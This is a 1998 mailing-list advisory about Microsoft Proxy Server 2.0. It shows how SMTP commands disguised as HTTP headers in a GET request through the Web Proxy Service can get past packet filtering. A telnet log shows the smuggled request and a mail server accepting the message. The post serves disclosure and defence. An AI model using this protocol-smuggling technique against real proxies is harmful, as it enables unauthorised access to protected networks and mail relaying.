WARNING: By-passing MS Proxy packet filtering

From: Mnemonix (mnemonixat_private)
Date: Tue Oct 06 1998 - 23:10:49 PDT

    Whilst playing around with Microsoft's Proxy Server 2, I came across an
    interesting "feature" that could allow someone to by-pass packet filtering
    if enabled.
    The essence of the "exploit" is to connect to a remote host on a given port
    - in the example provided I have used the SMTP port (25) - through the Web
    Proxy Service.
    What you attempt to do is disguise service-specific commands as HTTP
    headers. Below is a log of a telnet session where I've telnetted to the Web
    Proxy Service, made a GET request and passed off the SMTP commands as HTTP
    headers :

    ------------------------------------------8<--------------------------------
    ----------
    GET http://smtpmail.globalnet.co.uk:25/ HTTP/1.0
    mail from: meat_private
    rcpt to: mnemonixat_private
    data :
    Subject: This is the Subject Line
    :
     This is the body of the message. To get here do a Ctrl+J. To place a
    single dot on a line do another Ctrl+J
                                                              .

    220 sand2.global.net.uk ESMTP Exim 1.92 #1 Wed, 7 Oct 1998 06:51:37 +0100
    500 Command unrecognized
    500 Command unrecognized
    500 Command unrecognized
    250 <meat_private> is syntactically correct
    250 <mnemonixat_private> is syntactically correct
    354 Enter message, ending with "." on a line by itself
    250 OK id=0zQmVd-0007md-00
    500 Command unrecognized
    500 Command unrecognized

    ------------------------------------------8<--------------------------------
    ---------

    If the packet filter only allows incoming HTTP requests and the Web-Proxy
    Service gives Everybody access this could be used to gain entry to the
    "protected" network.
    This was tested on NT Server 4.0, Service Pack 3 with important hotfixes,
    IIS 3.0 and MS Proxy 2.0

    l8r
    Mnemonix
    http://www.diligence.co.uk/